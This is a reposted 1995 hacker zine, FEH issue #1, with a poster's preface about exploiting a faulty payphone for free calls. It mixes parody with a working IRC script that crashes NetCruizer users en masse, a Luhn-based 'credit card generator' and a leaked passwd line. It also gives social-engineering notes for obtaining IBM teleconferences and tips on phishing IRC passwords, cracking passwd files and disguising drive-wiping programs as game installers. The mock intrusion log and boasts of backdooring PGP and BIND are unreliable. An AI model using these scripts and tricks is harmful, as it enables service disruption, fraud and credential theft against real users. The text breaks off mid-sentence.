From Newsgroup: alt.2600
This is the first issue of FEH, it was a zine made by the #hack channel
on IRC and was considred high art at the time.
On a personal note:
Hooked on Phonics main order Line == 1-800-222-3334
These poor people were my go to for so many situations where I needed
an 800 number that I knew had a human on the other side. Impossible to
forget. Victims of good marketing I suppose.
There was a glitched out COCOT by my house that wouldn't cut the
microphone after hanging up but the keypad would be disabled.
1-800-ABC-DEFG was the hooked on phonics number from the commercial and
I'd call it and talk in a funny voice irritating them until they hung
up on me, I'd get access to the dial tone and then dial out using a
pocket dialer or microrecorder.
I tried this on several other COCOTS by always waiting after it hung up
to send a DTMF tone over the line but none of them ever worked for some
reason :(
I also learned this cocot may very well have been owned by a friend of
my mom. I stopped after that but sorry lady. Heh I remember wanting
to ask which payphones she owned but decided that would sound weird and
my mom probably didn't know.
There weren't many banks of COCOTs in my town so.. odds.
FFFFFFF EEEEEEE HHH HHH
FFF EEE HHH HHH
FFFFFFF EEEEEE HHHHHHHHHH
FFF EEEEEE HHHHHHHHHH
FFF EEE HHH HHH
FFF EEEEEEEE HHH HHH
U L A
X E X
I E O
N' T R
Issue #1
July 1st, 1995
Editor: ReDragon
Fuxin' Eleet Haxor of the Month: Hotrod
Fuxin' Eleet Haxor Member List: TOP SECRET
Official FEH Porn Supplier: twi
Official passed out drunk of FEH: y
Official FEH bartender: thomas
Chicago subsidiary of FEH: l0ck
Official FEH Historian: SnoCrash
Official FEH Warez Supplier: X
Official FEH telco security: Dale Drew
Official FEH distribution: Dark Tangent
Official Vehicle of FEH: Saab
Official Song of FEH: Thriller
Official Alcoholic Drink of FEH: Goldshlager
Official domain of FEH: feh.org
Our current email address:
feh@pussy.org
Greetz To (if we left you out, itz cuz we dont got yer inpho) :
aky, al, albatross, antichrist, armitage, artimage, baccahbar,
barnasch, basehead, bedlam, blackdeath, blackfire, bluesman, c-curve,
c_cipher, captain ahab, captain hook, ccrider, cerbus, chaos, clovis,
corak, crax, crimelord, crushed puppy, cyntaxera, cyrix, d-fens,
datarape, deathstar, defcon4, deker, digital, discodan, diskjockey,
dob, dr. freeze, dragonlady, drd00m, dreamweaver, drmenace, drunkfux,
drwarfare, dupre, eek, elastic, erikb, eternal, etrigan, excelsior,
firefly, fisch, frank carson, freiheit, friede, genx, gfm, gheap,
ghornet, grayareas, greylock, greystone, harvard, hellfire, henry,
hos, howcum, hypnosis, interrupt, joybubbles, kc, kewp, kl, kracker,
kurupt, leigh, lexicdvl, liquidice, loq, lordoptic, m0rph, mafiaman,
malice, meowmix, mindcrime, mindscrew, moonchild, mrpurple, mrx,
musicphreak, mycroft, nc-17, neophyte, niaht, nimrod, nitro187, noel,
novocain, nyar, nynex, olphart, omega, opiate, oreo, pandora, paradox,
pclord, plant, play, pmf, purpcon, pyro, qwik, r-a-d, radikahl,
radman, rahdude, ratscabies, razor, rebel, redskull, rhit, roach,
scojack, sevenup, silicon, sl, slammer, slpwalker, socket, solstice,
sparhawk, speedrcr, sphice, splice, sserpent, stealth, strauhd,
studload, subzero, swinder, tedbundy, tek, tekone, tele, tewph, tinyz,
totlvizn, tsoul, utahsaint, valgamon, virus, visionary, winter, wozz,
xn4rk, xymox, z1nk, zaphod, zorphix
Ahoy!
That's how Alexander Graham Bell used to answer his phone.
For some reason, it never caught on...
Well, here it is. The first issue of FEH, a 'zine in its incarnation
already famous and destined for greatness. Richard Steele, ex-cia
agent, says of FEH, "my penis is HUGE". While I'm not sure exactly how
this relates to FEH, he IS ex-cia, so we better publish whatever he
says. Erik Bloodaxe, aka Chris G., when asked about the prospects of
facing a FEH issue against Phrack, exclaimed "dude, i own you. i mean,
we're all running yer scripts anyhow." Grayarea, publisher of, oddly
enough, grayareas, wrote about our release, "spell it Gray Areas."
Perhaps most impressive of all, Emmanuel Goldstein, when faced with the
certain demise of 2600 given FEH's release, commented "will you leave
me alone if i give you a quote?" And so, without further adieu, I
present to you, FEH #1.
Table of Contents:
1. Intro (you've already read that part if you've gotten this far)
2. Table of Contents (maximum recursion depth exceeded)
3. Editorial by Fuxin' Eleet Haxors
4. /var/spool/mail/feh
5. Some C code by Fuxin' Eleet Haxors
6. hack logs by Fuxin' Eleet Haxors
7. "Just how eleet is FEH" by Rasputin Worldmonger (thats not his
real nick) 8. "Teleconf stuff" by Morph (ed: this was too complicated,
i didnt read it) 9. "Ways to amuse yerself" by Rush2 (other than
masturbating) 10. "The Tack Story" by Hotrod
11. "The Birth of FEH" by SnoCrash
12. An Interview with Dale Drew [part 1] by ReDragon
13. "How to Hack Using Scripts [part 1] by Seven Eleven
14. "How to Hack a Toaster Oven" by bl0ke
To Submit articles for future issues of FEH (expect it to be released
every month or so), e-mail ReDragon (current address:
redragon@chewy.wookie.net), or contact him through other means (most
people know where to find ReD).
// 3. Editorial
Too many people that are in the 'scene' today seem to do nothing but
hoarde things. Send me this, gimme this seems to be the prevailing
attitude of the day. If you are going to get on the net and try to
hoarde anything, make it knowledge. Spend your time learning instead
of trying to get toolz out of people and figuring out who the newest
irc chick is. Sometimes that means talking to people on irc, but most
of the time that means getting out there and doing it yourself. Its
fine if you want to do the whole social scene of hacking or phreaking
or warez or ansi, they are all different but in essence, they are all
about entertainment on IRC. But at the heart of them is a common goal,
why which ultimately people are judged. Which of these groups have the
purest goals? To have all the warez? To make the coolest ansi or
demo? To setup a conf? No, its knowledge. And that's why we are
fuxin' eleet hackers. And that is our ideal. Now, you may see us on
#hack 24 hours a day, but trust me, we idle a lot, and despite the fact
that we may be active in the 'social scene' of hacking, it is what we
are doing in another window while the irc screen scrolls that makes us
fuxin' eleet, not what we do on IRC.
- All the members of FEH
// 4. /var/spool/mail/feh
Someone sent this to one of the FEH members, anonymously, so we dunno
where it came from or who wrote it. The names were removed to protect
the obviously guilty...
Most of the stuff is from my latest performance report. Prior to that I
worked in the Computer Security Branch as the Virus/Pc expert. In that capacity I was responsible for taking care of any and all problems
concerning viruses and P.C.s. I was taken from a shop where I was
doing communications security due to my extensive knowledge of p.c.s
and my decent programming skills. They needed someone with some
knowledge and foundation in taking care of Personal Computers. I
established a base line program for dealing with computer viruses,
handling copyright issues and dealing with user problems associated
with Personal Computers. We were having some difficulty with users not
being able to distinguish between viruses and program gliches due to
software problems. That's where I came in. O.k. from there they
figured out that I am very good with computers. They needed someone to
handle Network Security who could do tiger team actions and monitor our networks. They felt due to my computer knowledge I would be the most
viable candidate. The following is directly from my performance report.
"Expert in all aspects of Wide Area Network(WAN) security support. Responsible for executing all portions of periodic system security
audits to find and correct host security vulnerablilities. Assists HQ
USAF Local Area Network (LAN) systems administrators and customers in implementation of security safeguards on all UNIX hosts. Proactively
analyzes Network Security Monitors (NSM) logs for indications of
attempted or successful intrusions. Systems administrator for DSST
SPARC station platforms."
"Heart of the agency's newly established wide area network security
program. Developed and documented procedures for monitoring the HQUSAF backbone. Security program has led to the most protected network within
the DOD rated by the Defense Information Systems Security Agency as the
best of 9000 systems audited by its elite Center for information
Security. Performs aggressive quarterly security audits of the HQ USAF
WAN. Created software tools and new hacking techniques used by the Air
Force Information Warfare Center for their on-line surveys of worldwide
sites. Resident expert on UNIX security.
Trained counterparts throughout the agency on our methodology enabling
them to secure their networks.
Regularly called upon by outside agencies for assistance.
Expertise passed to other system administrators through articles
published in directorate's security newsletter."
"leader who has brought the agency's network security program from the
infancy stage to a mature sustainable program which has Air Force wide recognition.
Knowledge of UNIX security and leading edge hacking techniques makes
him a valued source of information thoughout DOD."
// 5. Some C code by Fuxin' Eleet Haxors
fehit.c (we ran this through itself):
/* TH1S W1LL MAK3 Y0UR F1L3S FUX1N' 3L33T */
#1NCLUD3 <STD10.H>
#1NCLUD3 <STR1NGS.H>
#1NCLUD3 <CTYP3.H>
MA1N()
{
CHAR L1N3[100];
CHAR C;
1NT 1;
WH1L3(G3TS(L1N3))
{
F0R(1=0;L1N3[1];1++)
{
L1N3[1]=T0UPP3R(L1N3[1]);
1F(L1N3[1]=='3')
L1N3[1]='3';
1F(L1N3[1]=='1')
L1N3[1]='1';
1F(L1N3[1]=='0')
L1N3[1]='0';
}
PUTS(L1N3);
}
}
The world's most fuxin eleet credit card generator (yes it works):
main(){int i,x,n=1,t,s=0;scanf("%d",&i);for(;n<i;n++){scanf("%d",&x);
t=((n+i%2)%2+1)*x;s+=t+t/10;}printf("%i",(10-s%10)%10);}
Some random IRC script that we have no idea where it came from:
# NetCrasher -=- (c) 1995
# Utilize a nice bug in the NetCruizer IRC client to crash
# one or many NetCruizer lamers when they are using IRC.
^assign ctcpstring ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFING ER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^AFINGER ^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AF INGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFING ER^A
^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER ^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A ^AFINGER^A
^AFINGER^A ^AFINGER^A ^alias crash eval msg $0 $ctcpstring alias
crashall { ^assign TIME 1
^assign -DOIT
on ^raw_irc "% 352 *" {
^assign DOIT $DOIT;^timer $TIME crash $7
^assign TIME ${TIME+7}
}
on ^raw_irc "% 315 *" {
on raw_irc -"% 352 *"
on raw_irc -"% 315 *"
eval $DOIT
}
who *.ix.netcom.com
wait
echo *** Will crash ${(TIME-1)/7} users...
echo *** Time required to avoid excess flood: $TIME seconds
}
^on ^send_msg "% *^A*^A*^A*^A*^A*" echo *** Crashing NetCruizer lamer:
$0 echo *** NetCrasher loaded. /crash <nick> to crash a single
NetCruizer lamer echo *** /crashall to crash all NetCruizer lamers off
IRC (will lag you) echo *** Note that users crash immediately but do
not leave IRC until the echo *** server gives them a ping timeout.
Secure your PC using your joystick to enter your password:
[ed note: whoever wrote this should be shot, unless they have greatly
grown and only code in C now and anyhow I was only like 13
when I wrote it so gimme a break, fuck you ed!]
{$M 1024,0,1024}
uses dos,crt;
var TimeTick : procedure;
type joystickrec = record
b1 : boolean; b2 : boolean; x : word;y : word; end;
plist = record
pbyte : byte; next : pointer; end;
var joy : joystickrec; pass: boolean;isleft: boolean;
leftit: byte; rightit: byte;pb: byte;i:byte;
pfile: file of byte;xl,xc,xr : boolean;
yu,yc,yd : boolean;a,b:pointer;
pl,pl1: ^plist;
procedure brk;
interrupt;
begin
end;
procedure readjoystick(var joystick:joystickrec);
var regs: registers;
begin
regs.ah:=$84;
regs.dx:=$00;
intr($15,regs);
if (regs.al AND 16)=0 then joystick.b1:=true else
joystick.b1:=false;
if (regs.al AND 32)=0 then joystick.b2:=true else
joystick.b2:=false;
regs.ah:=$84;
regs.dx:=$01;
intr($15,regs);
joystick.x:=regs.ax;
joystick.y:=regs.bx;
xl:=false; xc:=false; xr:=false;
yu:=false; yc:=false; yd:=false;
with joystick do begin
if x<10 then xl:=true;
if (x>=50) and (x<=150) then xc:=true;
if (x>150) then xr:=true;
if (y<10) then yu:=true;
if (y>50) and (y<100) then yc:=true;
if (y>100) then yd:=true;
end;
end;
procedure writetf(bol:boolean);
begin
if bol then write('True ') else write('False ');
end;
procedure readfail;
begin
writeln('Verifying Joystick Input....');
writeln('Unable to Verify Password - System Halted');
halt(0);
end;
procedure xcenter;
begin
with joy do begin
repeat
readjoystick(joy);
if (not yc) then pass:=false;
until xc or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure ycenter;
begin
with joy do begin
repeat
readjoystick(joy);
if (not xc) then pass:=false;
until yc or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure left;
begin
with joy do begin
repeat
readjoystick(joy);
if (not yc) or (xr) then pass:=false;
until xl or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure right;
begin
with joy do begin
repeat
readjoystick(joy);
if (not yc) or (xl) then pass:=false;
until xr or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure up;
begin
with joy do begin
repeat
readjoystick(joy);
if (not xc) or (yd) then pass:=false;
until yu or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure down;
begin
with joy do begin
repeat
readjoystick(joy);
if (not xc) or (yu) then pass:=false;
until yd or (b1 and b2);
if (b1 and b2) then readfail;
end;
end;
procedure press1;
begin
with joy do begin
repeat
readjoystick(joy);
if (b2) then pass:=false;
until b1;
if (b1 and b2) then readfail;
end;
end;
procedure press2;
begin
with joy do begin
repeat
readjoystick(joy);
if (b1) then pass:=false;
until b2;
if (b1 and b2) then readfail;
end;
end;
procedure nopress1;
begin
with joy do begin
repeat
readjoystick(joy);
if (b2) then pass:=false;
until (not b1);
if (b1 and b2) then readfail;
end;
end;
procedure nopress2;
begin
with joy do begin
repeat
readjoystick(joy);
if (b1) then pass:=false;
until (not b2);
if (b1 and b2) then readfail;
end;
end;
begin
readjoystick(joy);
Writeln('Joystick Password Verification'); Writeln('------------------------------');
Writeln('Please Input Your Password with the Joystick Now');
Writeln('Press both joystick buttons simultaneously to verify your
password.'); getintvec($1b,a);
getintvec($23,b);
setintvec($1b,@brk);
setintvec($23,@brk);
assign(pfile,paramstr(1));
{$I-} reset(pfile); {$I+}
if ioerror<>0 then begin
writeln('Could Not Read Password - System Halted');
repeat until 1=0;
end;
new(pl);
while not eof(pfile) do begin
read(pfile,pb);
pl^.pbyte:=pb;
new(pl1);
pl^.next:=pl1;
pl1^.next:=nul;
pl:=pl1;
end;
close(pfile);
repeat
pass:=true;
leftit:=0;
isleft:=false;
with joy do
begin
xr:=false;
for i:=1 to 5 do begin
xcenter;
left;
end;
xcenter; right; xcenter; up; ycenter; down; ycenter;
for i:=1 to 5 do begin
xcenter;
right;
end;
xcenter; left; xcenter; up; ycenter; down; ycenter;
for i:=1 to 4 do begin press1; nopress1; end;
for i:=1 to 3 do begin press2; nopress2; end;
for i:=1 to 2 do begin press1; nopress1; end;
press2; nopress2;
repeat
readjoystick(joy);
until (b1 and b2);
if (pass) then begin
writeln('Verifying Joystick Input...');
writeln('Password Verified - Continue');
end
end;
if (pass) then begin
gotoxy(1,18); writeln('ACCESS DENIED - INCORRECT PASSWORD');
sound(500); delay(100); nosound; delay(100); sound(500); nosound;
sound(500); delay(100); nosound; delay(100); sound(500); nosound;
end;
until pass;
setintvec($1b,a);
setintvec($23,b);
end.
// 6. Fuxin' Eleet Haxor Logs by Hotrod
As an offering to the public to prove FEH's obvious superiority to
l0ck, I decided to demonstrate a n00 h4q t3kn1qu3 recently developed in
the FEH laboratories, located on a secret island in the Atlantic ocean.
The n00 h4q t3kn1qu3 has been demonstrated on wopr.mil, once regarded
as one of the most secure machines on the net. This machine alone
determines whether or not to launch the nuclear missles of the United
States. It runs on the US Military's top secret propriatary OS
"Lesb/OS". Lesb/OS machines are no match for the awesome power of FEH.
FEH proudly offers the following:
---
Log start 5/30/95 22:17:36
feh.org# uname -a
UNICOS feh 4.3.5 #5 Tue May 30 22:17:36 EDT 1995 T3D
feh.org# whoami
root
feh.org# telnet -safe wopr.mil
Trying 194.33.43.1...
Connected to wopr.mil.
Escape character is '^]'.
Don't even think about haxoring this site, bud.
Try if you like, you will fail.
Just don't get caught, or you'll pay the price.
wopr login: root
password: (we tried root)
Login Incorrect
wopr login: root
password: (we tried no password)
Login Incorrect
wopr login: root
password: (we tried pencil)
Login Incorrect
Ok, obviously our traditional hacking methods weren't working out at
this point. We decided to go for some more sekretive methods...
wopr login: lemmein
password:
Login Incorrect
wopr login: iamfeh
password:
Login Incorrect
wopr login: HEYASSHOLEIMROOTATFEHORGLEMMEINORYOUREDEAD
password:
Welcome to Lesb/OS 2.2.12
Last Login: NEVER
News:
The Lesb/OS upgrade to 2.2.12 was successful, we apoligize for any inconvenience this may have caused.
As of 5/28/95 @ 20:34 hours, we have been restored from Defcon 4 to
Defcon 5.
__
You have no mail.
wopr> pwd
/home/fehroot
wopr> cd /bin
wopr> ls -al sh
-rwxr-xr-x 2 bin bin 131072 Feb 3 01:53 sh
wopr> chmod 4755 sh
chmod: sh: not owner.
wopr> ~/look.im.feh.and.if.you.dont.follow.my.orders.youre.fucked
wopr# whoami
root
wopr# ftp
open feh.org
Connected to feh.org
220 feh FTP server (UNICOS feh 4.3.5 #5 Tue May 30 22:54:18 EDT 1995
T3D) ready.
Name (feh.org:root): feh
Password (feh.org:feh):
331 Password required for feh.
230 User feh logged in.
Remote system type is UNIX.
Using binary mode for file transfers.
lcd /etc
Local directory now /etc
get fehmotd
200 PORT command successful.
150 Opening BINARY mode data connection for fehmotd (1056 bytes).
226 Transfer complete.
1056 bytes received in 0.021 secs (49 Kbytes/sec)
quit
221 Goodbye.
wopr# cp /etc/fehmotd /etc/motd
wopr# cat /etc/motd
Congratulations, You've Been Haxored by the Best!
It wasn't LOD......
It wasn't l0ck.....
It wasn't m0ck.....
It wasn't mitnick..
You've been hacked by
FFFFFF EEEEEE HH HH
FF EE HH HH
FFFFF EEEE HHHHHHH
FF EE HH HH
FF EEEEEE HH HH
uxin leet axors
You are likely to go through several stages of emotions at this point.
First, denial, then anger, then acceptance that we are the most fuxin
eleet haxors. In fact, you better hope we are, cuz if we aren't fuxin
eleet and we still haxored yer system that means that yer a pretty fuxin
shitty sysadmin now, doesn't it? FEH is roxin' the net, tell all yer
friends we will soon be visiting their site, I hope they will be kind
enough to leave the door as open as you were.
wopr#
[Subsequently removing any trace of this machine from the net deleted.]
Comments:
Easier than even we at FEH thought it would be. We drove the machine
into such fear, that in our presence it gave us root. Note that we
never actually modified anything, or even ran any new shell, the
machine simply submitted to our eliteness, and, in a possible attempt
to garner mercy at our hands, gave us root without making us go through
the formalities.
Our work remains solid in this wonderful sight:
feh.org# whois -h nic.ddn.mil wopr.mil
No match for "WOPR.MIL".
Please be advised that this whois server only contains DOD Information.
All INTERNET Domain, IP Network Number, and ASN records are now kept in
the new Internet Registry, RS.INTERNIC.NET (198.41.0.5).
feh.org#
// 7. Just How Eleet Is FEH by a Fuxin' Eleet Haxor
1 AM A PR0UD M3MB3R 0F FEH. 1 SAY THAT PUBL1CALLY, 1 SAY THAT
L0UDLY, 1 SAY THAT STR0NGLY, AND 1 CAN SAY THAT CUZ W3 FUX1N R00L.
W3 AR3 3L33T. N0T 0NLY THAT, BUT W3 AR3 3L1T3. 3L33T AND FUXK1NG
R0CK1NG. W3 AR3 S0 C00L THAT W3 HAV3 R3C0NF1GUR3D R0UT3RS T0
AUT0MAT1CALLY G1V3 0UR PACK3TS H1GH3R PR10R1T13S. W3 0WN
APPR0X1MAT3LY 37% 0F ALL UN1X MACH1N3S 0R R0UT3RS 0N TH3 1NT3RN3T.
W3 SN1FF C1X, MA3-3AST, TH3 CH1CAG0 NAP, AND C3RT. 1N SH0RT W3 R0CK.
H0W CAN W3 R0CK TH1S MUCH, Y0U M1GHT ASK? W3LL, THAT'S R3ALLY A
S1LLY QU3ST10N, AND Y0U'D B3ST N0T ASK 1T, B3CAUS3 W3'V3 SCR1PTS
S3TUP 0N 0UR SN1FF3RS (APPR0X1MAT3LY 4000 MACH1N3S HAV3
AUT0SN1FF3R/F1LT3RS) THAT W1LL MA1L US THAT Y0U'R3 TALK1NG AB0UT US.
1N SH0RT - WATCH 0UT. W3 AR3 TH3 P30PL3 WH0 RUN TH3 N3T. W3 AR3 TH3
P30PL3 WH0 BACKD00R3D PGP, W3 BACKD00R3D B1ND, W3 BACKD00R3D ARGUS,
TCP_WRAPP3RS, AND 1F Y0U KN3W H0W MANY ST0CK B1NAR13S 1N S0LAR1S,
1R1X, AND A1X W3 HAV3 TR0JAN3D 1N TH3 C0D3R'S MACH1N3S, Y0U'D SH1T
Y0UR PANTS. W3 R3C0NF1GUR3D R0UT1NG AT TH3 NAPS AND C1X B3CAUS3 TH3
FAT FUX WH0 RUN TH3 NAPS AR3 T00 FUCK1NG STUP1D AND LAZY T0 D0 1T
R1GHT. 1T D1DN'T HURT THAT TH3 PACK3TS TRAV3L 0V3R TH3 SN1FF3R'S
3TH3R, BUT 3V3N W1TH THAT 3XTRA (TRANSPAR3NT) H0P, W3 1NCR3AS3D
3FF1C13NCY BY 3.2 %. BUT TH3 0NLY TH1NG Y0U R3ALLY N33D T0 KN0W 1S
THAT W3 AR3 FUCK1NG 3L33T, W3 AR3 HACK3RS, AND W3 W1LL D0 WHAT W3
WANT. D0N'T TRY T0 R3S1ST US, W3 W1LL 0V3RC0M3 ANY S1LLY C3RT
ADV1S0R13S Y0U PUT 0UT. W3 AR3 TH3 0N3S WH0 S3TUP M1TN1CK'S BUST,
B3CAUS3 W3 W3R3 T1R3D 0F H1S S1LLY PR3SS. W3 AR3 TH3 0N3S WH0 MA1L3D
SH1M0' TH3 L0GS. W3 AR3 FEH. W3 AR3 Y0UR FR13ND, UNT1L Y0U M0V3
AGA1NST US. AND TH3 Y0U W1LL F1ND Y0UR SYST3M, Y0UR T3L3PH0N3, Y0UR
B1LLS, Y0U L1F3, MUCH M0R3 D1FF1CULT. L0V3 FEH - W3 AR3 Y0UR MAST3R,
AND W3 AR3 Y0UR 0WN3R. B3 G00D T0 US, AND W3 W1LL TR3AT Y0U W3LL.
R3B3L AND F33L PA1N. [FEH] 3VANG3L1ST - RASPUT1N W0RLDM0NG3R
// 8. Something about Teleconferencing Stuff by Morph
An Overview of American Teleconferencing Service,
^..^ their relationship to IBM, and TiNets ^..^
(oo) - eye [Part 1] (oo) -
me ( . ) phear researched and compiled by Morpheus
( . ) too `. ' feh with thanks to Prophet and
also the ` .' . cooperative
employees I spoke with. . PHEAR
PHEAR -=FEH=-
root:Donteventhinkofit:0:1:Operator:/:/bin/csh -=FEH=-
-[*.gsfc.nasa.gov:/etc/passwd]
Kopyright (k) Morpheus 1995,
all rights reserved.
[ed note: feel free to steal this and claim it as your own]
--------------------------
Introduction
--------------------------
A Canadian affiliate of CAFBL tipped me off that IBM teleconferences
had been used before through a toll free line. So I investigated how
IBM teleconfs are setup, who makes them with what software, and how to
access IBM conferences.
Well I called up IBM's toll-free information line available from
the 800# index and began a very blunt attempt to socially engineer
teleconfs from IBM. The guy I talked to with told me to work through my
regional directors, not through the software information line, and
he gave me the number to American Teleconferencing Service, which
exclusivly handles IBM extrenal teleconfs. American is a southern
company, located in Tousan, AZ.
This was originally designed as a scam article, a step by step guide
to the tricks and traps involved with setting up American
Teleconferences through IBM. Upon further consideration, I went back
and edited the article to make it more informational and less "LeT'z
HaCk Th0sE FuCkeRz!" I am sure that the rewording of this paper will
not make fraudulent use of the information any less compelling, but I
do feel sure that half-assed phreakers would be better off sticking
with old AT&T. [ed note:
i wish he just gave us codes, all this technical stuff makes my head
hurt.]
--------------------------------------
A look at an American Teleconfernce
--------------------------------------
American Teleconferences conference setup looks like this:
===========================================
- 6500800 - TiNet Dialin - Accessible to IBM and not you.
- 7194440800 - External Dialin - Regular Telephone number.
- 157998 - Conference ID - Use this to access account and conference. ===========================================
Also, American teleconference offers an optional toll free line to dial
in to the conference. This is the only option they offer for external
access to the conferences. TiNet works from probably all IBM phone
lines, by dialing 271 followed by the TiNet number.
American works on a fairly primitive conferencing system, they simply
connect each line to the other lines as they call in. There is no
conference hub, so if you're the first caller, you get put on hold
until the next caller comes in. The music sucks, i mean, this is
really terrible music. [ed note: you might like the music, some people
set these confs up themselves just so they can hear the hold music, and
nobody ever calls.]
An automated conference conection does not exist, and there is no real
access code to enter. Once you dial into the conference, you are
greeted by the operator who asks you for you conference ID number and
your name. A list of names can be generated and given to the operator
before the conference.
---------------------------
How American Operates
---------------------------
All IBM groups that use American have files in American's
Databases. Contained in your file is your name, title, office
phone, office address, which will also be your billing address, and
your department number. This is an example of what the file would look
like when brought up on their screen:
========================== ============
Name [ Bruce Sterling ] : [ Hi Bruce ]
Dpt [ # 5176 ] : [ from the last 4 digits of phone number ]
Addr [ 227 Maple Lane ] : [ Office adress / billing adress ]
Addr [ Phila PA 19191 ] : [ Use the closest corp/office ]
Phon [ 512-323-5176 ] : [ Office Numba ]
XXXX [ Billed 1/11/11 (status) ] : [ Did yew pay your bills? ]
XXXX [ Billed 1/11/11 (status) ]
XXXX [ (Notes) ] : [ He writes books ]
========================== ============
This is certainly *not* a screen capture, so the screen the operator
will see is very probably more complex. Also the Fields represent
variable areas, you probably get a better idea of what the operator
is thinking when talking to you through this.
[ed note: the operator is probably thinking about how her life ended up
so miserably that she is working as a telephone operator.]
Billing status can include a refuse notice for delayed payment or
whatever. The Notes can be preferences, such as toll free access or
possibly something else. Callback confirmation is usually not
utilized, since the bill is not included with the phone bill, but is delivered to the billing address. Your number appears on their
terminal also, with whatever comments are attached to that.
American has become so exclusively dedicated to serving IBM that
operators will sometimes get on and say "IBM Conference Service." I
also spoke to some operators about what software they were running and
on what type of terminals which appears to be a big secret. [ed note:
probably NOT os/2] EDICTS: Electronic Distribution Information Control Transaction System, file transfer system. Operates RO6000 Systems.
Distributed by IBM. This is one of the programs used by American, the
operator told me that much before she woke up a bit. This is a datacommunications software package, and is seperate from their audio /
video teleconferencing software.
----------------------------------
TiNet, TiLines, and TiSystems
----------------------------------
TiNet dialins do not exist. The only way to access TiNet Services is
through IBM's phone system. TiNet is simply the telephone system IBM
strung together which makes conferencing and interoffice communications
easier.
In fact, TiNet was created as a datacommunications system that ended
up with a gross excess of bandwith so they expanded into Voice
Capabilities. TiLines can be setup in virtually any office, and for any
large bussiness.
Tinet's selling feature, so to speak, is that offices with TiLines
installed can bypass long distance charges and Telephone Companies
all together. This is particularly useful for Banks and Credit
Unions who prefer the Security of private phone lines than the inherent
lack of security in public / normal phone lines. [ed note: what about
clipper?]
In conclusion I would like to state that all of the information
mentioned is for purely informational purposes and that, should any
of you abuse IBM and American Teleconferencing, that would be illegal
and you would be prosecuted. But then again, would any of us choose to
break the law? Heavens no! [ed note: if you do happen to break the law,
drop us a note so we know that this is useful.]
-------------------------
Fun Filled Numbers
-------------------------
IBM Software Information Service == 1-800-426-2255
IBM General Information Line == 1-800-426-3333
American Teleconference Reservation Line == 1-800-723-9093
Hooked on Phonics main order Line == 1-800-222-3334
IBM CORP main office [Philadelphia] == 215-851-2008
IBM Teleconference Director's office [Philadelphia] = 215-851-3677
The author's inpho:
Morpheus can be reached at GBA 215-750-0392 or
morph@chewy.wookie.net or
morph@iia2.org. Send your public pgp key if you want a reply. Also,
you can reach him at 800/862-0094 during the day from US, or from
canada, 800/925-9999 ## 719. On EFnet, he's on #hack, #zines, and
#cafbl. -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a
mQCNAi/R9UAAAAEEALDNmlPQJ/CmH1Ba77TmMKBaW6zUUcTrFuOe5duBZvyQpkGR frHppvXbTXHB3jm4jHL9kCueo1IJGXfOTC4lyI/rGBr731NdwFYlsdeWh5Ampvj0 YKchVh5mp7glTQYS/rtARupXlb/H2X+wY5JgsJK1dFQJ3QfyA2bQA34kJ66RAAUR tB9Nb3JwaGV1cyBLTCA8bW9ycGhAaXhjLml4Yy5uZXQ+
=SrJR
-----END PGP PUBLIC KEY BLOCK-----
// 9. How to amuse yourself by Rush2
[ed note: this is what people that are not FEH might try]
1. The Michael scam. One day a few days ago I got very very bored. I
said what the hell. I bet I can get a lamer to give me his/her
password. I thought of the most common name, michael, and changed my
irc nick to .. DUH Michael.. within 10 minutes someone had mistaken me
for her best friend michael.. she thanked me for somethign about
hooking her up with alliance not the service, some guy. I bullshitted
for 10 minutes, then really panick y like "Oh crap I just screwed up my account.. majorly would you gime your login and password pleaseeeee".
Wellshe was that stupid and she gave it to me. I really wanted to know
if anyone else was that stupid. I tried a lot of common names for the
next 2 hours, john, mike, larry etc..etc.. I succeeded wiht 99% of my
attempts, I got 19, failed once. SO do something like this if you are
REALLY bored. [ed note: a bottle of scotch is far more effective than
this]
2. Trade passwd files.. hehe... when your bored change yer name on irc,
go into #Hack see if you dont get kicked off and ask for passwd files..
[ed note: if you don't get kicked off, hurt everyone that was opped]
if you are really bored this can be fun and you can get some new
systems to get in.. now unless your someone that is cracking them just
to get as many accounts as you can (I feel hypocritical currently I
have 1400 valid accounts on this local provider, on my computer
upstairs (in just one day YES people in my area have easy passwds..
only a 1mb file (AND just with login name I got 300 yesterday.. haha I)
And I am hearing a lot of beeps (root was the first cracked account:)..
this is something to do if you feel bored and lame...
[ed note: mail the cracked password file to
cert@cert.org and you win a
prize]
3. Write really nifty little utils in quick basic (if your still stuck
on a dos box)... nothing is niftier than writing a shitty program in
qbasic that uses a captured installation display screen from a game
or something (or modify it to say mortal combat 3 or soemthing, the
little warez kids cum from this) and really make it format their
drive... yes this is lame but you KNOW we all get this bored at one
time or another in our lives.
[ed note: Super Street Fighter is more Fuxin' Eleet]
4. Use Irc. Yes this is the lamest of the lame. #hack. Where
ignorance is shown and knowledge forgotten. If you want immaturity, brattiness, kids playing with their krad bots or scripts, or your
typical op wars, go to #hack, #phreak, #2600, or my
<coughcoughnotcoughcoug> favorite, #ansi. Yes #ansi people with any intelligence know it is american national standards institute, dorky
little kids that have no life (we have no lives either but we arent
little kids ... we are middle kids.. ?) [ed note: if anyone can figure
out what the hell he is talking about, email me] think it is an art
form and a way for them to be cool... their idea of coolness is being worshipped by pervert ed, immature, talentless, dweebs with pcs.. most
of these peopel are aol and prodigy rejects... ...anyways... this is
something to do when you are SUICIDALLY bored. [ed note: actually
suicide might be a better solution]
5. Get on one off those cracked accounts (see number 1) and type
